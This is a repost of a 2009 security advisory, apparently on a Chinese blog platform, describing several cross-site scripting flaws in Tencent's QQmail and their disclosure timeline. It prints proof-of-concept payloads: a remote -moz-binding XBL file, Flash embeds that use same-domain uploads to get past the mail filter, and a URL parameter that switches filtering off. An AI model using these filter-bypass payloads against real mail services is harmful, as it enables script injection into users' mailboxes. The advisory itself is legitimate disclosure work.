QQmail Multiple Xss Vulnerabilities

最新推荐文章于 2024-07-25 19:54:22 发布
最新推荐文章于 2024-07-25 19:54:22 发布
阅读量485 收藏
点赞数
分类专栏: 安全漏洞 文章标签: filter firefox url flash 腾讯 xml

 

作者: www.80vul.com

1. firefox2 css xss vulnerabilities

<style>BODY{-moz-binding:url("http://www.80vul.coom/test.xml#xss")}</style>

test.xml:

<?xml version="1.0"?>
<bindings xmlns="http://www.mozilla.org/xbl">
<bindingSpellE">xss">
<implementation>
<constructor><![CDATA[alert('XSS')]]></constructor>
</implementation>
</binding>
</bindings>

[PS:firefox3开始不允许-moz-binding:url引用远程文件]

2. 设计缺陷导致的xss漏洞

A.上传文件直接导致xss漏洞

在qqmail的附件和图片上传功能上存在着设计缺陷:

* 上传文件存放域和qqmail是同一个域
* 上传的文件后缀及内容根本没有做安全限制,直接导致上传一些恶意文件导致xss[如swf文件]

B.qqmail的Filter系统是不允许引用外部文件的[src=],但是它允许本地相对路径的文件引用

例如:

<embed src="http://www.80vul.com/test.swf" type="application/x-shockwave-flash" allowscriptaccess="always" width="0" height="0"></embed>

会被替换为:

<embed src="#" type="application/x-shockwave-flash" allowscriptaccess="always" width="0" height="0"></embed>

但是它允许本地相对路径的文件引用,利用这个设计缺陷和上面A提到的”上传文件存放域和qqmail是同一个域”,综合利用导致xss漏洞

<embed src="/data/test.swf" type="application/x-shockwave-flash" allowscriptaccess="always" width="0" height="0"></embed>

同样的比如上面1里提到的,也可以通过这个实现对firefox3的利用.[另外flash xml等文件的调用是可以修改后缀的 J]

C.qqmail的Filter系统一个设计缺陷导致完全绕过Filter系统.

qqmail的Filter系统的设计者,可能是为了功能与安全过滤上的和谐,给用户留下了一个’开关’:当提交开关filterflag=true时, Filter系统将不在起作用:

http://m348.mail.qq.com/cgi-bin/readmail?mailid=ZC1217iK5yq~a8ToGOBNZbWCXXXw86&folderid=1&t=readmail&&&groupid=&sid=Cks1q-OzUAjlT0gB&disptype=html&dispimg=1&filterflag=true

3. 其他
2009.4.17-18发现漏洞
2009.4.18 通知腾讯安全中心
2009.5.x 修补以上漏洞

liusan_8310
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
存储型xss漏洞怎么解决_扫描器开发——查找反射型XSS漏洞
weixin_39631953的博客
11-24 801
​  翻译文章,原文:Writing a scanner to find reflected XSS vulnerabilities — Part 1[1]代码地址:https://github.com/akhil-reni/xsstutorial , 可以直接看代码,感觉文章本身有点乱,看完才觉得好多地方说的很乱2016年,我从事一个与burp suite非常相似的Web应用程序扫描程序项目,该...
QQmail插件
05-11
QQmail插件
跨站点脚本(XSS):Web应用程序敌人
culing2941的博客
09-17 383
web xss跨站脚本攻击Web applications are both a valuable resource for organizations and one of the biggest threats to their cyber security. Web apps are designed to be exposed to users via the Internet, allo...
Using setJavaScriptEnabled can Introduce XSS Vulnerabilities into&
未来很长,但我会努力的走下去。
04-28 4078
Android Warning : Using setJavaScriptEnabled can introduce XSS vulnerabilities into you application, review carefully. 原因:如果你的应用没有在WebView内直接使用JavaScript,不要调用setJavaScriptEnabled()我们见过这个方法在简单的代码中执行,也
XSS(跨站脚本攻击)详解 (下)
我不生产数据,只是数据的搬运工
02-03 785
XSS(跨站脚本攻击)详解 (下) Hack9月5日 XSS漏洞的简单攻击测试 反射型XSS: 先放出源代码 //前端 1.html:<html><head lang="en"> <meta charset="UTF-8"> ...
QQMAIL.rar_qqmail_site:www.pudn.com
09-19
QQMAIL.rar是一个包含有关QQ邮箱(qqmail)信息的压缩文件,可以从网站www.pudn.com获取。这个压缩包可能包含代码、文档或其他资源,帮助我们理解如何通过POP3协议来统计并显示一个QQ邮箱中所有邮件的数量。POP3,...
qqmail shortcut-crx插件
04-04
语言:中文 (简体) qq email shortcut keysNext email:Ctrl+ (arrow) rightDelete email:Ctrl + delete增加QQ邮箱的快捷键下一封邮件:Ctrl键+右箭头qq email shortcut keysNext email:Ctrl+ (arrow) rightDelete ...
自动下载-QQMail-附加:Python +Selenium+ Chrome模拟登陆QQ邮箱,批量下载附件,本地重命名
02-26
支持Mac和Windows系统 批量下载QQ邮箱附件,下载完后修改文件重命名 因为工作原因,需要处理QQ邮箱上来自各地网友的投稿附件。数量比较多(上千份),如果手动一个下载非常麻烦。。。 而且有些发来的附件命名也不...
XSS漏洞检测手段
Kevin's Blog
05-05 7711
文章目录一、手工注入检测1.1 Cheat Sheet二、自动化工具检测2.1 BurpSuite之XSS Validator2.1.1 运行原理2.1.2 插件安装2.1.3 phantomjs安装2.1.4 下载xss.js2.1.5 配置XSS Validator2.1.6 配置Intruder模块2.1.7 XSS漏洞检测2.1.8 工具优缺点2.2 神器之XSSer2.2.1 工具介绍 ...
xss (跨站脚本攻击)教程
U侠学子
02-09 1924
转自: https://excess-xss.com/ Part One: Overview What is XSS? Cross-site scripting (XSS) is a code injection attack that allows an attacker to execute malicious JavaScript in another user's b
【安全牛学习笔记】Kali Linux 安装-持久加密USB安装、熟悉环境、熟悉BASH命令
weixin_34159110的博客
09-06 1612
持久加密USB安装-1LUKS: linux UNified Key Setup 磁盘分区加密规范 不依赖于操作系统的磁盘级加密 Windows——DoxBox 后端:dm-crypt 前端:cryptsetup 微软的bitlocker将镜像刻录到U盘 dd if=kali-linux-1.1.0-amd64.iso of=/dev/sdb bs=1Mroot...
WebView的使用
huanongjingchao的专栏
01-14 6810
原文作者: iceskysl 原文地址: http://my.eoe.cn/iceskysl/archive/1028.html 1.添加权限 要用Webview,确认你在**AndroidManifest.xml** 中添加了使用许可 "android.permission.INTERNET" ,否则会出Web page not available错误。
XSS扫描系统原理
xysoul的专栏
04-21 9968
那个broken web application 后续会慢慢研究的。。。先把工作任务完成。。 工作任务1:搜索类似演示网站 http://code.google.com/p/websecurify/wiki/DemoSites 工作任务2:检索XSS自动化扫描工具,开源,了解检测原理 ===============================================
Linux环境docker部署Firefox结合内网穿透远程使用浏览器测试
qq_63320529的博客
07-24 963
Linux环境docker部署Firefox结合内网穿透远程使用浏览器测试
解析capl文件生成XML Test Module对应的xml工具
m0_56315547的博客
07-25 659
解析CANoe的CAPL中.can/.cain文件,生成XML Test Module中使用的xml
Day9--学习三种方式实现mybatis数据库查询(XML映射文件、注解方式、接口扫描)
gitee_nanzhi66的博客
07-25 748
MyBatis 是一个优秀的持久层框架,支持多种方式进行数据库操作,包括使用独立的映射文件(XML)、注解和接口扫描。下面我将分别给出这三种方式的代码案例。
chromedriver-mac-arm64_126.0.6474.0.zip
最新发布
07-31
chromedriver-mac-arm64_126.0.6474.0.zip
No module named 'qqmail'
09-06
The error message "No module named 'qqmail'" indicates that the module 'qqmail' is not installed in your Python environment. To resolve this issue, you need to install the 'qqmail' module. You can ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值